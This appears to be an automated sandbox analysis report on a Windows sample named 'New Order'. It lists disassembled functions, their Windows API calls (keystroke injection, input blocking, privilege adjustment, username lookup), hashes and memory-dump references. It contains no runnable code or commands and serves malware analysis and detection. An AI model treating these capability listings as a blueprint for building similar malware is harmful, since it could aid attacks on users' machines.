Opcode Fuzzy Hash: 513845be8c0f377c742f22081614047fe21bd45ee0f9d293fbd9057d70fb2289
Instruction Fuzzy Hash: 54F0F471950309FFDB01DFE4DD89AAEBBBCEB08705F504565E901E2191E774EA448A50

Function 002E4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(002F28E9,?,002E4CBE,002F28E9,003888B8,0000000C,002E4E15,002F28E9,00000002,00000000,?,002F28E9), ref: 002E4D09
TerminateProcess.KERNEL32(00000000,?,002E4CBE,002F28E9,003888B8,0000000C,002E4E15,002F28E9,00000002,00000000,?,002F28E9), ref: 002E4D10
ExitProcess.KERNEL32 ref: 002E4D22

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4110d0f90e23ce14416faf8d151b38d563accf757a19a9445915f2e8675adffc
Instruction ID: ca554c6324b3d20d72ae0d5f6f2ba348e49beeda499aca3de6c36df2120fd4cc
Opcode Fuzzy Hash: 4110d0f90e23ce14416faf8d151b38d563accf757a19a9445915f2e8675adffc
Instruction Fuzzy Hash: 63E09231060688AFCB12AF55DD09A587B6DEB85786F504054F9058A232CB39DA62CA90

Function 002FC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 002FC36C

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 71494ce2f012d4099cbc747850e790ab5104ace6aa4c9ee096ecd98cf0281150
Instruction ID: 840e1b59ae425cc8649d627ff96faac4b9da79a0e8165f3112cd9707ba446d4d
Opcode Fuzzy Hash: 71494ce2f012d4099cbc747850e790ab5104ace6aa4c9ee096ecd98cf0281150
Instruction Fuzzy Hash: 7641497291021DAFCB24AFB9CD48DBBB778EB84394F2042B9FA05C7180E6709D50CB50

Function 0031D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0031D28C

Strings

X64, xrefs: 0031D2A8

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: cd9a4beffbc4b14ee15571cac262679f4d13fc50362ef4affa548e0646c404fa
Instruction ID: 3fef6111e59919f4d551cc12e33024ba4fc8c58d898d8ebdfe061425d2dac85d
Opcode Fuzzy Hash: cd9a4beffbc4b14ee15571cac262679f4d13fc50362ef4affa548e0646c404fa
Instruction Fuzzy Hash: BBD0C9B482521DEFCF95CB90DC88DD9B3BCBB04306F100552F106A2140D77495498F10

Function 002ECAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 9aea1da6cbdc104f0ea716386c28c77aabb88573365d3d0e4f43e9c82941cee3
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: DA023D71E502599FDF14CFA9C8806ADFBF1FF48324F65416AD919EB380D731A9528B80

Function 002CCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#9, xrefs: 002CCF7F
Variable is not of type 'Object'., xrefs: 00310C40

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#9
API String ID: 0-248921893
Opcode ID: 6a31fa9ecca7844bff4b20dad26f86776f7be915fc9ff8124b6ed99cd9a7188a
Instruction ID: 42618cba3557cda18e42a78b567566b83b11382b647c8c366b7493922cfcb6c2
Opcode Fuzzy Hash: 6a31fa9ecca7844bff4b20dad26f86776f7be915fc9ff8124b6ed99cd9a7188a
Instruction Fuzzy Hash: 37327174920219DBCF19DF90C881FEDB7B5BF09304F24425EE80A6B291D7B5AE95CB60

Function 003368EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00336918
FindClose.KERNEL32(00000000), ref: 00336961

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f7a0cda5fc84741b418aebe3fdb9971a98a194e5f5c2226af636b590725518ec
Instruction ID: 4735f3c54cf2768cde0283f81789ac0faccfa55ec1738610ebd86ae3d0bf956a
Opcode Fuzzy Hash: f7a0cda5fc84741b418aebe3fdb9971a98a194e5f5c2226af636b590725518ec
Instruction Fuzzy Hash: ED118E31614200AFC711DF29D8C5B16BBE5EF85329F15C69DE4698F6A2C730EC45CB91

Function 003337B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00344891,?,?,00000035,?), ref: 003337E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00344891,?,?,00000035,?), ref: 003337F4

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 241c633b0a37726148fc14bd580e08ba24b6596f3eb801668e8b00eb74d28efc
Instruction ID: 3905f9ae69b6372a2581db69703d8add84d615edd7c56a5544b86a98553a6d78
Opcode Fuzzy Hash: 241c633b0a37726148fc14bd580e08ba24b6596f3eb801668e8b00eb74d28efc
Instruction Fuzzy Hash: 22F0E5B06153292AEB2117668C8DFEB3AAEEFC4765F000265F509D22A1D9609944C7B0

Function 0032B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0032B25D
keybd_event.USER32(?,7707C0D0,?,00000000), ref: 0032B270

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: c2f89081bf16a536132620710cd90410f82391ac41d567e791c47f83f16f748d
Instruction ID: 48f56254dad45fb2b92eff69495e802b70d5f46660f8171763eb057a469eb5c0
Opcode Fuzzy Hash: c2f89081bf16a536132620710cd90410f82391ac41d567e791c47f83f16f748d
Instruction Fuzzy Hash: 36F01D7181434DAFDB069FA1D805BAEBFB4FF08309F009409F955A51A2D3798611DF94

Function 003210BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003211FC), ref: 003210D4
CloseHandle.KERNEL32(?,?,003211FC), ref: 003210E9

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 9d3b4b700cd54bb3f5a87913ef7ac5ac1b58b441bf5a9fa150ac7a70ac0aef53
Instruction ID: 307db15c30bf961aec735cf111fe47ef4eae13034a37d8f79be1c0a447a02fbe
Opcode Fuzzy Hash: 9d3b4b700cd54bb3f5a87913ef7ac5ac1b58b441bf5a9fa150ac7a70ac0aef53
Instruction Fuzzy Hash: ECE04F32024710AEE7662B51FD05E7377ADEB04311F10882EF4A6804B1DB62ACA0DB54

Function 002F676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002F6766,?,?,00000008,?,?,002FFEFE,00000000), ref: 002F6998

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 59bb373e15275a0212d1a5cd61d0255fc52d657648a34f6a1ae07ba3ed64fffe
Instruction ID: e5f98010e7cfaebdc8ab40168d1326cba60131a9e1b71f1c2795f971a442373b
Opcode Fuzzy Hash: 59bb373e15275a0212d1a5cd61d0255fc52d657648a34f6a1ae07ba3ed64fffe
Instruction Fuzzy Hash: 8DB16E31620609DFD715CF28C48AB65BBE0FF053A4F25866CE999CF2A2C375D9A5CB40

Function 002DB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0031851F

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7de17476afaca92e86cf1d54cb16f5466a8ecf41c796da794efac74b901e8d24
Instruction ID: 23a676bf0ea20500cdeb7cf15149b7d3f097361697b34d054f7165fb7643818a
Opcode Fuzzy Hash: 7de17476afaca92e86cf1d54cb16f5466a8ecf41c796da794efac74b901e8d24
Instruction Fuzzy Hash: 74128E75910229DFCB26CF58C890AEEB7B5FF48310F15819AE809EB251DB709E91CF94

Function 0033EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0033EABD

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: d7db4e29067f472df6bc79b3aace4d05aa96e520b72bedfbbfdac408772567fd
Instruction ID: 4fd02ac707c02b5f06114e3a88439e1b1f90ce9c9e36b08453564c385f586382
Opcode Fuzzy Hash: d7db4e29067f472df6bc79b3aace4d05aa96e520b72bedfbbfdac408772567fd
Instruction Fuzzy Hash: 73E04F312202059FC711EF69D845E9AF7EDAF98760F00841AFC49C73A1DB70E8418B90

Function 002E09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,002E03EE), ref: 002E09DA

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8460153475dd84a838b2f253103fc88a545a012537300968eb2f119a978a2aca
Instruction ID: 1cec7bbb723e6a83115bea70925c0f0f1db787cf89eb6890f6151d1a7bcd8f50
Opcode Fuzzy Hash: 8460153475dd84a838b2f253103fc88a545a012537300968eb2f119a978a2aca
Instruction Fuzzy Hash:

Function 002E781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 002E798B

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 0188e689822dcab70dfe10f388c033b8c43f30b739b180910bef176d61eb12a6
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 075143716FC6C75ADB38CD6B88597BE23899F22340FD80519D886C7283C661DE31E752

Function 00332046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&9, xrefs: 00332053

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID: 0&9
API String ID: 0-1206990766
Opcode ID: a4ee392d3de6c355b5d4a8f9b8c8a93f625b423e309e6171dcf65db1e96d1c27
Instruction ID: 17fe1a20feaf81d6810077d0ebb778aceca68c8f007472d48d00c86be7b966e0
Opcode Fuzzy Hash: a4ee392d3de6c355b5d4a8f9b8c8a93f625b423e309e6171dcf65db1e96d1c27
Instruction Fuzzy Hash: E321A5326216118BDB2CCE79C86267F73E9A754310F15862EE4A7C77D0DE7AA904CB80

Function 002F6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4f52700b190720fbaabe537c278799d12e19e24c73fdde5e9b489713aa74c8
Instruction ID: 657b97fd1e65c6e8e85e09b8ca8a9e0acd05c7693856a09bffc3851fa2146b0b
Opcode Fuzzy Hash: 3b4f52700b190720fbaabe537c278799d12e19e24c73fdde5e9b489713aa74c8
Instruction Fuzzy Hash: 23323322D39F054DD7239A34CC22336A64DAFB73C5F15D737E82AB5AA9EB69C4934100

Function 002DCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff55efb9d276d806a5fa91dae3a392576274300170485e939ed3a247ed8afdd
Instruction ID: d43d827cf69576b65c0cf99c63abad1b25fd73898321d8cc603094f9e5ffe624
Opcode Fuzzy Hash: bff55efb9d276d806a5fa91dae3a392576274300170485e939ed3a247ed8afdd
Instruction Fuzzy Hash: 64320431AB42168BCF2ECE28C4906FD77A5EF49300F29A56BD9498B7A1D230DDD1DB41

Function 002C7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3761f26cdc6ecd18b816e654fa7647d29c272ca5cc85de7c86fceab528ed47a
Instruction ID: 05791665809e9261dc01966c8b4aa302ec7b3226344be83781c9a4af7126b614
Opcode Fuzzy Hash: b3761f26cdc6ecd18b816e654fa7647d29c272ca5cc85de7c86fceab528ed47a
Instruction Fuzzy Hash: 1822C070A1060ADFDF14CFA5C991BAEB3B5FF48304F244629E816A7291EB369D61CF50

Function 002C91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9dc30b8a046a9a79fd47a48be03d25343a63e0d97e4e706469b48e4f4f82da
Instruction ID: 91907235598cccda6c3c24d9ff3d55dc44eb84a23b44988eb4cf20922b2d12ac
Opcode Fuzzy Hash: 4f9dc30b8a046a9a79fd47a48be03d25343a63e0d97e4e706469b48e4f4f82da
Instruction Fuzzy Hash: C602E5B1A10209EBDB05DF54D891BAEB7B5FF44300F118569E80A9B390EB71AE60CF95

Function 002E1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: adbb32dabf5862c8bea0018cff7c132520efa29b163cb771cc59dee4915a9d81
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 5A9187726680E34ADB294A3B853407DFFE15A523A135E07BEE4F2CA1C5EE348974D620

Function 002E19B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262570655.00000000002C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002C0000, based on PE: true

Associated: 00000000.00000002.1262514390.00000000002C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.000000000035C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262635032.0000000000382000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262696321.000000000038C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1262719744.0000000000394000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_New Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 7135cbe2cedc2a73c7e99a8593daed14bba133b4f83334719db96cccf8306a54
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: B79152722690E34ADB2D4A7B857403DFFE15A923A539A07BED4F2CA1C1FE348574D620

Function 002E7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

